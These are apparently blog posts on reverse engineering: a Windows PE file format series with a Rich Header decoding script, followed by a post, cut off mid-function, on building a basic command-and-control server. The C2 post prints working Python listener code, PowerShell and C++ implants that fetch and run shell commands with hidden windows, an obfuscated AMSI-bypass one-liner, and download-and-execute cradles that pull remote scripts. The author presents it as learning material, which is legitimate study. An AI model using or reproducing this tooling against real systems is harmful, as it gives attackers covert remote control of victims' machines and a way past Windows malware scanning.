F1 1D EA F8 39 72 E9 F9 61 1A E8 F8 3F 72 E9 F9 
3A 72 E8 F9 0A 72 E9 F9 BC 02 E0 F8 3B 72 E9 F9 
BC 02 16 F9 3B 72 E9 F9 BC 02 EB F8 3B 72 E9 F9 
52 69 63 68 3A 72 E9 F9 00 00 00 00 00 00 00 00

Script:

import textwrap

def xor(data, key):
	return bytearray( ((data[i] ^ key[i % len(key)]) for i in range(0, len(data))) )

def rev_endiannes(data):
	tmp = [data[i:i+8] for i in range(0, len(data), 8)]
	
	for i in range(len(tmp)):
		tmp[i] = "".join(reversed([tmp[i][x:x+2] for x in range(0, len(tmp[i]), 2)]))
	
	return "".join(tmp)

data = bytearray.fromhex("7E1387AA3A72E9F93A72E9F93A72E9F9330A7AF93072E9F9F11DE8F83872E9F9F11DECF82B72E9F9F11DEDF83072E9F9F11DEAF83972E9F9611AE8F83F72E9F93A72E8F90A72E9F9BC02E0F83B72E9F9BC0216F93B72E9F9BC02EBF83B72E9F9")
key  = bytearray.fromhex("3A72E9F9")

rch_hdr = (xor(data,key)).hex()
rch_hdr = textwrap.wrap(rch_hdr, 16)

for i in range(2,len(rch_hdr)):
	tmp = textwrap.wrap(rch_hdr[i], 8)
	f1 = rev_endiannes(tmp[0])
	f2 = rev_endiannes(tmp[1])
	print("{} {} : {}.{}.{}".format(f1, f2, str(int(f1[4:],16)), str(int(f1[0:4],16)), str(int(f2,16)) ))

Please note that I had to reverse the byte-order because the data was presented in little-endian.

After running the script we can see an output that’s identical to PE-bear’s interpretation, meaning that the script works fine.

Translating these values into the actual tools types and versions is a matter of collecting the values from actual Visual Studio installations.
I checked the source code of bearparser (the parser used in PE-bear) and I found comments mentioning where these values were collected from.

//list from: https://github.com/kirschju/richheader
//list based on: https://github.com/kirschju/richheader + pnx's notes

You can check the source code for yourself, it’s on hasherezade’s (PE-bear author) Github page.


Conclusion

In this post we talked about the first two parts of the PE file, the DOS header and the DOS stub, we looked at the members of the DOS header structure and we reversed the DOS stub program.
We also looked at the Rich Header, a structure that’s not essentially a part of the PE file format but was worth checking.

The following image summarizes what we’ve talked about in this post:

A dive into the PE file format - PE file structure - Part 1: Overview

By: 0xRick
22 October 2021 at 01:01

A dive into the PE file format - PE file structure - Part 1: Overview

Introduction

The aim of this post is to provide a basic introduction to the PE file structure without talking about any details.


PE files

PE stands for Portable Executable, it’s a file format for executables used in Windows operating systems, it’s based on the COFF file format (Common Object File Format).

Not only .exe files are PE files, dynamic link libraries (.dll), Kernel modules (.srv), Control panel applications (.cpl) and many others are also PE files.

A PE file is a data structure that holds information necessary for the OS loader to be able to load that executable into memory and execute it.


Structure Overview

A typical PE file follows the structure outlined in the following figure:

If we open an executable file with PE-bear we’ll see the same thing:

DOS Header

Every PE file starts with a 64-bytes-long structure called the DOS header, it’s what makes the PE file an MS-DOS executable.

DOS Stub

After the DOS header comes the DOS stub which is a small MS-DOS 2.0 compatible executable that just prints an error message saying “This program cannot be run in DOS mode” when the program is run in DOS mode.

NT Headers

The NT Headers part contains three main parts:

  • PE signature: A 4-byte signature that identifies the file as a PE file.
  • File Header: A standard COFF File Header. It holds some information about the PE file.
  • Optional Header: The most important header of the NT Headers, its name is the Optional Header because some files like object files don’t have it, however it’s required for image files (files like .exe files). This header provides important information to the OS loader.

Section Table

The section table follows the Optional Header immediately, it is an array of Image Section Headers, there’s a section header for every section in the PE file.
Each header contains information about the section it refers to.

Sections

Sections are where the actual contents of the file are stored, these include things like data and resources that the program uses, and also the actual code of the program, there are several sections each one with its own purpose.


Conclusion

In this post we looked at a very basic overview of the PE file structure and talked briefly about the main parts of a PE files.
In the upcoming posts we’ll talk about each one of these parts in much more detail.

A dive into the PE file format - Introduction

By: 0xRick
22 October 2021 at 01:00

A dive into the PE file format - Introduction

What is this ?

This is going to be a series of blog posts covering PE files in depth, it’s going to include a range of different topics, mainly the structure of PE files on disk and the way PE files get mapped and loaded into memory, we’ll also discuss applying that knowledge into building proof-of-concepts like PE parsers, packers and loaders, and also proof-of-concepts for some of the memory injection techniques that require this kind of knowledge, techniques like PE injection, process hollowing, dll reflective injection etc..

Why ?

The more I got into reverse engineering or malware development the more I found that knowledge about the PE file format is absolutely essential, I already knew the basics about PE files but I never learned about them properly.

Lately I have decided to learn about PE files, so the upcoming series of posts is going to be a documentation of what I’ve learned.

These posts are not going to cover anything new, there are a lot of resources that talk about the same thing, also the techniques that are going to be covered later have been known for some time. The goal is not to present anything new, the goal is to form a better understanding of things that already exist.

Contribution

If you’d like to add anything or if you found a mistake that needs correction feel free to contact me. Contact information can be found in the about page.

Update:

File structure - part 1: Overview
File structure - part 2: DOS Header, DOS Stub and Rich Header
File structure - part 3: NT Headers
File structure - part 4: Data Directories, Section Headers and Sections
File structure - part 5: PE Imports (Import Directory Table, ILT, IAT)
File structure - part 6: PE Base Relocations
File structure - lab1: Writing a PE Parser

Building a Basic C2

By: 0xRick
16 April 2020 at 01:00

Introduction

It’s very common that after successful exploitation an attacker would put an agent that maintains communication with a c2 server on the compromised system, and the reason for that is very simple, having an agent that provides persistency over large periods and almost all the capabilities an attacker would need to perform lateral movement and other post-exploitation actions is better than having a reverse shell for example. There are a lot of free open source post-exploitation toolsets that provide this kind of capability, like Metasploit, Empire and many others, and even if you only play CTFs it’s most likely that you have used one of those before.

Long story short, I only had a general idea about how these tools work and I wanted to understand the internals of them, so I decided to try and build one on my own. For the last three weeks, I have been searching and coding, and I came up with a very basic implementation of a c2 server and an agent. In this blog post I’m going to explain the approaches I took to build the different pieces of the tool.

Please keep in mind that some of these approaches might not be the best and also the code might be kind of messy, If you have any suggestions for improvements feel free to contact me, I’d like to know what better approaches I could take. I also like to point out that this is not a tool to be used in real engagements, besides only doing basic actions like executing cmd and powershell, I didn’t take in consideration any opsec precautions.

This tool is still a work in progress, I finished the base but I’m still going to add more execution methods and more capabilities to the agent. After adding new features I will keep writing posts similar to this one, so that people with more experience give feedback and suggest improvements, while people with less experience learn.

You can find the tool on github.

Overview

About c2 servers / agents

As far as I know,

A basic c2 server should be able to:

  • Start and stop listeners.
  • Generate payloads.
  • Handle agents and task them to do stuff.

An agent should be able to:

  • Download and execute its tasks.
  • Send results.
  • Persist.

A listener should be able to:

  • Handle multiple agents.
  • Host files.

And all communications should be encrypted.

About the Tool

The server itself is written in python3, I wrote two agents, one in c++ and the other in powershell, listeners are http listeners.

I couldn’t come up with a nice name so I would appreciate suggestions.

Listeners

Basic Info

Listeners are the core functionality of the server because they provide the way of communication between the server and the agents. I decided to use http listeners, and I used flask to create the listener application.

A Listener object is instantiated with a name, a port and an IP address to bind to:

class Listener:    

    def __init__(self, name, port, ipaddress):
        
        self.name       = name
        self.port       = port
        self.ipaddress  = ipaddress
        ...

Then it creates the needed directories to store files, and other data like the encryption key and agents’ data:

...	
    	
self.Path       = "data/listeners/{}/".format(self.name)
self.keyPath    = "{}key".format(self.Path)
self.filePath   = "{}files/".format(self.Path)
self.agentsPath = "{}agents/".format(self.Path)
        
...
        
if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

if os.path.exists(self.agentsPath) == False:
    os.mkdir(self.agentsPath)

if os.path.exists(self.filePath) == False:
    os.mkdir(self.filePath)

...

After that it creates a key, saves it and stores it in a variable (more on generateKey() in the encryption part):

...
    
if os.path.exists(self.keyPath) == False:
    
    key      = generateKey()
    self.key = key
    
    with open(self.keyPath, "wt") as f:
        f.write(key)
else:
    with open(self.keyPath, "rt") as f:
        self.key = f.read()
            
...

The Flask Application

The flask application which provides all the functionality of the listener has 5 routes: /reg, /tasks/<name>, /results/<name>, /download/<name>, /sc/<name>.

/reg

/reg is responsible for handling new agents, it only accepts POST requests and it takes two parameters: name and type. name is for the hostname while type is for the agent’s type.

When it receives a new request it creates a random string of 6 uppercase letters as the new agent’s name (that name can be changed later), then it takes the hostname and the agent’s type from the request parameters. It also saves the remote address of the request which is the IP address of the compromised host.

With these information it creates a new Agent object and saves it to the agents database, and finally it responds with the generated random name so that the agent on the other side can know its name.

@self.app.route("/reg", methods=['POST'])
def registerAgent():
    name     = ''.join(choice(ascii_uppercase) for i in range(6))
    remoteip = flask.request.remote_addr
    hostname = flask.request.form.get("name")
    Type     = flask.request.form.get("type")
    success("Agent {} checked in.".format(name))
    writeToDatabase(agentsDB, Agent(name, self.name, remoteip, hostname, Type, self.key))
    return (name, 200)

/tasks/<name>

/tasks/<name> is the endpoint that agents request to download their tasks, <name> is a placeholder for the agent’s name, it only accepts GET requests.

It simply checks if there are new tasks (by checking if the tasks file exists), if there are new tasks it responds with the tasks, otherwise it sends an empty response (204).

@self.app.route("/tasks/<name>", methods=['GET'])
def serveTasks(name):
    if os.path.exists("{}/{}/tasks".format(self.agentsPath, name)):
        
        with open("{}{}/tasks".format(self.agentsPath, name), "r") as f:
            task = f.read()
            clearAgentTasks(name)
        
        return(task,200)
    else:
        return ('',204)

/results/<name>

/results/<name> is the endpoint that agents request to send results, <name> is a placeholder for the agent’s name, it only accepts POST requests and it takes one parameter: result for the results.

It takes the results and sends them to a function called displayResults() (more on that function in the agent handler part), then it sends an empty response 204.

@self.app.route("/results/<name>", methods=['POST'])
def receiveResults(name):
    result = flask.request.form.get("result")
    displayResults(name, result)
    return ('',204)

/download/<name>

/download/<name> is responsible for downloading files, <name> is a placeholder for the file name, it only accepts GET requests.

It reads the requested file from the files path and it sends it.

@self.app.route("/download/<name>", methods=['GET'])
def sendFile(name):
    f    = open("{}{}".format(self.filePath, name), "rt")
    data = f.read()
            
    f.close()
    return (data, 200)

/sc/<name>

/sc/<name> is just a wrapper around the /download/<name> endpoint for powershell scripts, it responds with a download cradle prepended with a oneliner to bypass AMSI, the oneliner downloads the original script from /download/<name> , <name> is a placeholder for the script name, it only accepts GET requests.

It takes the script name, creates a download cradle in the following format:

IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/download/SCRIPT_NAME')

and prepends that with the oneliner and responds with the full line.

@self.app.route("/sc/<name>", methods=['GET'])
def sendScript(name):
    amsi     = "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE](\"{1}{0}\"-F'F','rE' ) ) ; ( GeT-VariaBle ( \"1Q2U\" +\"zX\" ) -VaL).\"A`ss`Embly\".\"GET`TY`Pe\"(( \"{6}{3}{1}{4}{2}{0}{5}\" -f'Util','A','Amsi','.Management.','utomation.','s','System' )).\"g`etf`iElD\"( ( \"{0}{2}{1}\" -f'amsi','d','InitFaile' ),(\"{2}{4}{0}{1}{3}\" -f 'Stat','i','NonPubli','c','c,' )).\"sE`T`VaLUE\"(${n`ULl},${t`RuE} ); "
    oneliner = "{}IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/download/{}\')".format(amsi,self.ipaddress,str(self.port),name)
    
    return (oneliner, 200)

Starting and Stopping

I had to start listeners in threads, however flask applications don’t provide a reliable way to stop the application once started, the only way was to kill the process, but killing threads wasn’t also so easy, so what I did was creating a Process object for the function that starts the application, and a thread that starts that process which means that terminating the process would kill the thread and stop the application.

...
	
def run(self):
    self.app.logger.disabled = True
    self.app.run(port=self.port, host=self.ipaddress)

...
    
def start(self):
    
    self.server = Process(target=self.run)

    cli = sys.modules['flask.cli']
    cli.show_server_banner = lambda *x: None

    self.daemon = threading.Thread(name = self.name,
                                       target = self.server.start,
                                       args = ())
    self.daemon.daemon = True
    self.daemon.start()

    self.isRunning = True
    
def stop(self):
    
    self.server.terminate()
    self.server    = None
    self.daemon    = None
    self.isRunning = False

...

Agents

Basic Info

As mentioned earlier, I wrote two agents, one in powershell and the other in c++. Before going through the code of each one, let me talk about what agents do.

When an agent is executed on a system, first thing it does is get the hostname of that system then send the registration request to the server (/reg as discussed earlier).

After receiving the response which contains its name it starts an infinite loop in which it keeps checking if there are any new tasks, if there are new tasks it executes them and sends the results back to the server.

After each loop it sleeps for a specified amount of time that’s controlled by the server, the default sleep time is 3 seconds.

We can represent that in pseudo code like this:

get hostname
send [hostname, type], get name

loop{
	
	check if there are any new tasks
	
	if new_tasks{
    	
            execute tasks
    	    send results
    
    }
    
    else{
    	do nothing
    }
    
    sleep n 
}

So far, agents can only do two basic things, execute cmd and powershell.

PowerShell Agent

I won’t talk about the crypto functions here, I will leave that for the encryption part.

First 5 lines of the agent are just the basic variables which are the IP address, port, key, name and the time to sleep:

$ip   = "REPLACE_IP"
$port = "REPLACE_PORT"
$key  = "REPLACE_KEY"
$n    = 3
$name = ""

As mentioned earlier, It gets the hostname, sends the registration request and receives its name:

$hname = [System.Net.Dns]::GetHostName()
$type  = "p"
$regl  = ("http" + ':' + "//$ip" + ':' + "$port/reg")
$data  = @{
    name = "$hname" 
    type = "$type"
    }
$name  = (Invoke-WebRequest -UseBasicParsing -Uri $regl -Body $data -Method 'POST').Content

Based on the received name it creates the variables for the tasks uri and the results uri:

$resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
$taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")

Then it starts the infinite loop:

for (;;){
...
sleep $n
}

Let’s take a look inside the loop, first thing it does is request new tasks, we know that if there are no new tasks the server will respond with a 204 empty response, so it checks if the response is not null or empty and based on that it decides whether to execute the task execution code block or just sleep again:

$task  = (Invoke-WebRequest -UseBasicParsing -Uri $taskl -Method 'GET').Content
    
    if (-Not [string]::IsNullOrEmpty($task)){

Inside the task execution code block it takes the encrypted response and decrypts it, splits it then saves the first word in a variable called flag:

$task = Decrypt $key $task
$task = $task.split()
$flag = $task[0]

If the flag was VALID it will continue, otherwise it will sleep again. This ensures that the data has been decrypted correctly.

if ($flag -eq "VALID"){

After ensuring that the data is valid, it takes the command it’s supposed to execute and the arguments:

$command = $task[1]
$args    = $task[2..$task.Length]

There are 5 valid commands, shell, powershell, rename, sleep and quit.

shell executes cmd commands, powershell executes powershell commands, rename changes the agent’s name, sleep changes the sleep time and quit just exits.

Let’s take a look at each one of them. The shell and powershell commands basically rely on the same function called shell, so let’s look at that first:

function shell($fname, $arg){
    
    $pinfo                        = New-Object System.Diagnostics.ProcessStartInfo
    $pinfo.FileName               = $fname
    $pinfo.RedirectStandardError  = $true
    $pinfo.RedirectStandardOutput = $true
    $pinfo.UseShellExecute        = $false
    $pinfo.Arguments              = $arg
    $p                            = New-Object System.Diagnostics.Process
    $p.StartInfo                  = $pinfo
    
    $p.Start() | Out-Null
    $p.WaitForExit()
    
    $stdout = $p.StandardOutput.ReadToEnd()
    $stderr = $p.StandardError.ReadToEnd()

    $res = "VALID $stdout`n$stderr"
    $res
}

It starts a new process with the given file name whether it was cmd.exe or powershell.exe and passes the given arguments, then it receives stdout and stderr and returns the result which is the VALID flag appended with stdout and stderr separated by a newline.

Now back to the shell and powershell commands, both of them call shell() with the corresponding file name, receive the output, encrypt it and send it:

if ($command -eq "shell"){
    $f    = "cmd.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }
    elseif ($command -eq "powershell"){
    
    $f    = "powershell.exe"
    $arg  = "/c "
            
    foreach ($a in $args){ $arg += $a + " " }

    $res  = shell $f $arg
    $res  = Encrypt $key $res
    $data = @{result = "$res"}
                
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'

    }

The sleep command updates the n variable then sends an empty result indicating that it completed the task:

elseif ($command -eq "sleep"){
    $n    = [int]$args[0]
    $data = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The rename command updates the name variable and updates the tasks and results uris, then it sends an empty result indicating that it completed the task:

elseif ($command -eq "rename"){
    $name    = $args[0]
    $resultl = ("http" + ':' + "//$ip" + ':' + "$port/results/$name")
    $taskl   = ("http" + ':' + "//$ip" + ':' + "$port/tasks/$name")
    
    $data    = @{result = ""}
    Invoke-WebRequest -UseBasicParsing -Uri $resultl -Body $data -Method 'POST'
    }

The quit command just exits:

elseif ($command -eq "quit"){
	exit
    }

C++ Agent

The same logic is applied in the c++ agent so I will skip the unnecessary parts and only talk about the http functions and the shell function.

Sending http requests wasn’t as easy as it was in powershell, I used the winhttp library and with the help of the Microsoft documentation I created two functions, one for sending GET requests and the other for sending POST requests. And they’re almost the same function so I guess I will rewrite them to be one function later.


std::string Get(std::string ip, unsigned int port, std::string uri)
{
    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"GET", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      WINHTTP_NO_ADDITIONAL_HEADERS,
                                      0,
                                      WINHTTP_NO_REQUEST_DATA,
                                      0,
                                      0,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;
}

std::string Post(std::string ip, unsigned int port, std::string uri, std::string dat)
{
    LPSTR data     = const_cast<char*>(dat.c_str());;
    DWORD data_len = strlen(data);

    LPCWSTR additionalHeaders = L"Content-Type: application/x-www-form-urlencoded\r\n";
    DWORD headersLength       = -1;

    std::wstring sip     = get_utf16(ip, CP_UTF8);
    std::wstring suri    = get_utf16(uri, CP_UTF8);

    std::string response;

    LPSTR pszOutBuffer;

    DWORD dwSize       = 0;
    DWORD dwDownloaded = 0;
    BOOL  bResults     = FALSE;
 
    HINTERNET hSession = NULL,
              hConnect = NULL,
              hRequest = NULL;

    hSession = WinHttpOpen(L"test",
                           WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME,
                           WINHTTP_NO_PROXY_BYPASS,
                           0);

    if (hSession) {

        hConnect = WinHttpConnect(hSession,
                                  sip.c_str(),
                                  port,
                                  0);
    }

    if (hConnect) {

        hRequest = WinHttpOpenRequest(hConnect,
                                      L"POST", suri.c_str(),
                                      NULL,
                                      WINHTTP_NO_REFERER,
                                      WINHTTP_DEFAULT_ACCEPT_TYPES,
                                      0);
    }

    if (hRequest) {

        bResults = WinHttpSendRequest(hRequest,
                                      additionalHeaders,
                                      headersLength,
                                      (LPVOID)data,
                                      data_len,
                                      data_len,
                                      0);
    }

    if (bResults) {

        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }

    if (bResults)
    {
        do
        {
            dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)){}

            pszOutBuffer = new char[dwSize + 1];
            if (!pszOutBuffer)
            {
                dwSize = 0;
            }
            else
            {
                ZeroMemory(pszOutBuffer, dwSize + 1);

                if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) {}
                else {
                    
                    response = response + std::string(pszOutBuffer);
                    delete[] pszOutBuffer;
                }
            }
        } while (dwSize > 0);
    }

    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    return response;

}

The shell function does the almost the same thing as the shell function in the other agent, some of the code is taken from Stack Overflow and I edited it:


CStringA shell(const wchar_t* cmd)
{
    CStringA result;
    HANDLE hPipeRead, hPipeWrite;

    SECURITY_ATTRIBUTES saAttr = {sizeof(SECURITY_ATTRIBUTES)};
    saAttr.bInheritHandle = TRUE; 
    saAttr.lpSecurityDescriptor = NULL;

    
    if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0))
        return result;

    STARTUPINFOW si = {sizeof(STARTUPINFOW)};
    si.dwFlags     = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.hStdOutput  = hPipeWrite;
    si.hStdError   = hPipeWrite;
    si.wShowWindow = SW_HIDE; 

    PROCESS_INFORMATION pi = { 0 };

    BOOL fSuccess = CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    if (! fSuccess)
    {
        CloseHandle(hPipeWrite);
        CloseHandle(hPipeRead);
        return result;
    }

    bool bProcessEnded = false;
    for (; !bProcessEnded ;)
    {
        bProcessEnded = WaitForSingleObject( pi.hProcess, 50) == WAIT_OBJECT_0;

        for (;;)
        {
            char buf[1024];
            DWORD dwRead = 0;
            DWORD dwAvail = 0;

            if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL))
                break;

            if (!dwAvail)
                break;

            if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead)
                break;

            buf[dwRead] = 0;
            result += buf;
        }
    }

    CloseHandle(hPipeWrite);
    CloseHandle(hPipeRead);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return result;
}

I would like to point out an important option in the process created by the shell function which is:

si.wShowWindow = SW_HIDE; 

This is responsible for hiding the console window, this is also added in the main() function of the agent to hide the console window:

int main(int argc, char const *argv[]) 
{

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    ...

Agent Handler

Now that we’ve talked about the agents, let’s go back to the server and take a look at the agent handler.

An Agent object is instantiated with a name, a listener name, a remote address, a hostname, a type and an encryption key:

class Agent:

    def __init__(self, name, listener, remoteip, hostname, Type, key):

        self.name      = name
        self.listener  = listener
        self.remoteip  = remoteip
        self.hostname  = hostname
        self.Type      = Type
        self.key       = key

Then it defines the sleep time which is 3 seconds by default as discussed, it needs to keep track of the sleep time to be able to determine if an agent is dead or not when removing an agent, otherwise it will keep waiting for the agent to call forever:

self.sleept    = 3

After that it creates the needed directories and files:

self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
self.tasksPath = "{}tasks".format(self.Path, self.name)

if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

And finally it creates the menu for the agent, but I won’t cover the Menu class in this post because it doesn’t relate to the core functionality of the tool.

self.menu = menu.Menu(self.name)
        
self.menu.registerCommand("shell", "Execute a shell command.", "<command>")
self.menu.registerCommand("powershell", "Execute a powershell command.", "<command>")
self.menu.registerCommand("sleep", "Change agent's sleep time.", "<time (s)>")
self.menu.registerCommand("clear", "Clear tasks.", "")
self.menu.registerCommand("quit", "Task agent to quit.", "")

self.menu.uCommands()

self.Commands = self.menu.Commands

I won’t talk about the wrapper functions because we only care about the core functions.

First function is the writeTask() function, which is a quite simple function, it takes the task and prepends it with the VALID flag then it writes it to the tasks path:

def writeTask(self, task):
    
    if self.Type == "p":
        task = "VALID " + task
        task = ENCRYPT(task, self.key)
    elif self.Type == "w":
        task = task
	
    with open(self.tasksPath, "w") as f:
            f.write(task)

As you can see, it only encrypts the task in case of powershell agent only, that’s because there’s no encryption in the c++ agent (more on that in the encryption part).

Second function I want to talk about is the clearTasks() function which just deletes the tasks file, very simple:

def clearTasks(self):
    
    if os.path.exists(self.tasksPath):
        os.remove(self.tasksPath)
    else:
        pass

Third function is a very important function called update(), this function gets called when an agent is renamed and it updates the paths. As seen earlier, the paths depend on the agent’s name, so without calling this function the agent won’t be able to download its tasks.

def update(self):
    
    self.menu.name = self.name
    self.Path      = "data/listeners/{}/agents/{}/".format(self.listener, self.name)
    self.tasksPath = "{}tasks".format(self.Path, self.name)
        
    if os.path.exists(self.Path) == False:
        os.mkdir(self.Path)

The remaining functions are wrappers that rely on these functions or helper functions that rely on the wrappers. One example is the shell function which just takes the command and writes the task:

def shell(self, args):
    
    if len(args) == 0:
        error("Missing command.")
    else:
        command = " ".join(args)
        task    = "shell " + command
        self.writeTask(task)

The last function I want to talk about is a helper function called displayResults which takes the sent results and the agent name. If the agent is a powershell agent it decrypts the results and checks their validity then prints them, otherwise it will just print the results:

def displayResults(name, result):

    if isValidAgent(name,0) == True:

        if result == "":
            success("Agent {} completed task.".format(name))
        else:
            
            key = agents[name].key
            
            if agents[name].Type == "p":

                try:
                    plaintext = DECRYPT(result, key)
                except:
                    return 0
            
                if plaintext[:5] == "VALID":
                    success("Agent {} returned results:".format(name))
                    print(plaintext[6:])
                else:
                    return 0
            
            else:
                success("Agent {} returned results:".format(name))
                print(result)

Payloads Generator

Any c2 server would be able to generate payloads for active listeners, as seen earlier in the agents part, we only need to change the IP address, port and key in the agent template, or just the IP address and port in case of the c++ agent.

PowerShell

Doing this with the powershell agent is simple because a powershell script is just a text file so we just need to replace the strings REPLACE_IP, REPLACE_PORT and REPLACE_KEY.

The powershell function takes a listener name, and an output name. It grabs the needed options from the listener then it replaces the needed strings in the powershell template and saves the new file in two places, /tmp/ and the files path for the listener. After doing that it generates a download cradle that requests /sc/ (the endpoint discussed in the listeners part).

def powershell(listener, outputname):
    
    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port
    key     = listeners[listener].key

    with open("./lib/templates/powershell.ps1", "rt") as p:
        payload = p.read()

    payload = payload.replace('REPLACE_IP',ip)
    payload = payload.replace('REPLACE_PORT',str(port))
    payload = payload.replace('REPLACE_KEY', key)

    with open(outpath, "wt") as f:
        f.write(payload)
    
    with open("{}{}".format(listeners[listener].filePath, outputname), "wt") as f:
        f.write(payload)

    oneliner = "powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString(\'http://{}:{}/sc/{}\')\"".format(ip, str(port), outputname)

    success("File saved in: {}".format(outpath))
    success("One liner: {}".format(oneliner))

Windows Executable (C++ Agent)

It wasn’t as easy as it was with the powershell agent, because the c++ agent would be a compiled PE executable.

It was a huge problem and I spent a lot of time trying to figure out what to do, that was when I was introduced to the idea of a stub.

The idea is to append whatever data that needs to be dynamically assigned to the executable, and design the program in a way that it reads itself and pulls out the appended information.

In the source of the agent I added a few lines of code that do the following:

  • Open the file as a file stream.
  • Move to the end of the file.
  • Read 2 lines.
  • Save the first line in the IP variable.
  • Save the second line in the port variable.
  • Close the file stream.
std::ifstream ifs(argv[0]);
	
ifs.seekg(TEMPLATE_EOF);
	
std::getline(ifs, ip);
std::getline(ifs, sPort);

ifs.close();

To get the right EOF I had to compile the agent first, then update the agent source and compile again according to the size of the file.

For example this is the current definition of TEMPLATE_EOF for the x64 agent:

#define TEMPLATE_EOF 52736

If we take a look at the size of the file we’ll find that it’s the same:

# ls -la
-rwxrwxr-x 1 ... ... 52736 ... ... ... winexe64.exe

The winexe function takes a listener name, an architecture and an output name, grabs the needed options from the listener and appends them to the template corresponding to the selected architecture and saves the new file in /tmp:

def winexe(listener, arch, outputname):

    outpath = "/tmp/{}".format(outputname)
    ip      = listeners[listener].ipaddress
    port    = listeners[listener].port

    if arch == "x64":
        copyfile("./lib/templates/winexe/winexe64.exe", outpath)
    elif arch == "x32":
        copyfile("./lib/templates/winexe/winexe32.exe", outpath)        
    
    with open(outpath, "a") as f:
        f.write("{}\n{}".format(ip,port))

    success("File saved in: {}".format(outpath))

Encryption

I’m not very good at cryptography so this part was the hardest of all. At first I wanted to use AES and do Diffie-Hellman key exchange between the server and the agent. However I found that powershell can’t deal with big integers without the .NET class BigInteger, and because I’m not sure that the class would be always available I gave up the idea and decided to hardcode the key while generating the payload because I didn’t want to risk the compatibility of the agent. I could use AES in powershell easily, however I couldn’t do the same in c++, so I decided to use a simple xor but again there were some issues, that’s why the winexe agent won’t be using any encryption until I figure out what to do.

Let’s take a look at the crypto functions in both the server and the powershell agent.

Server

The AESCipher class uses the AES class from the pycrypto library, it uses AES CBC 256.

An AESCipher object is instantiated with a key, it expects the key to be base-64 encoded:

class AESCipher:
    
    def __init__(self, key):

        self.key = base64.b64decode(key)
        self.bs  = AES.block_size

There are two functions to pad and unpad the text with zeros to match the block size:

def pad(self, s):
    return s + (self.bs - len(s) % self.bs) * "\x00"

def unpad(self, s):
    s = s.decode("utf-8")
    return s.rstrip("\x00")

The encryption function takes plain text, pads it, creates a random IV, encrypts the plain text and returns the IV + the cipher text base-64 encoded:

def encrypt(self, raw):
    
    raw      = self.pad(raw)
    iv       = Random.new().read(AES.block_size)
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    
    return base64.b64encode(iv + cipher.encrypt(raw.encode("utf-8")))

The decryption function does the opposite:

def decrypt(self,enc):
    
    enc      = base64.b64decode(enc)
    iv       = enc[:16]
    cipher   = AES.new(self.key, AES.MODE_CBC, iv)
    plain    = cipher.decrypt(enc[16:])
    plain    = self.unpad(plain)
    
    return plain 

I created two wrapper function that rely on the AESCipher class to encrypt and decrypt data:

def ENCRYPT(PLAIN, KEY):

    c   = AESCipher(KEY)
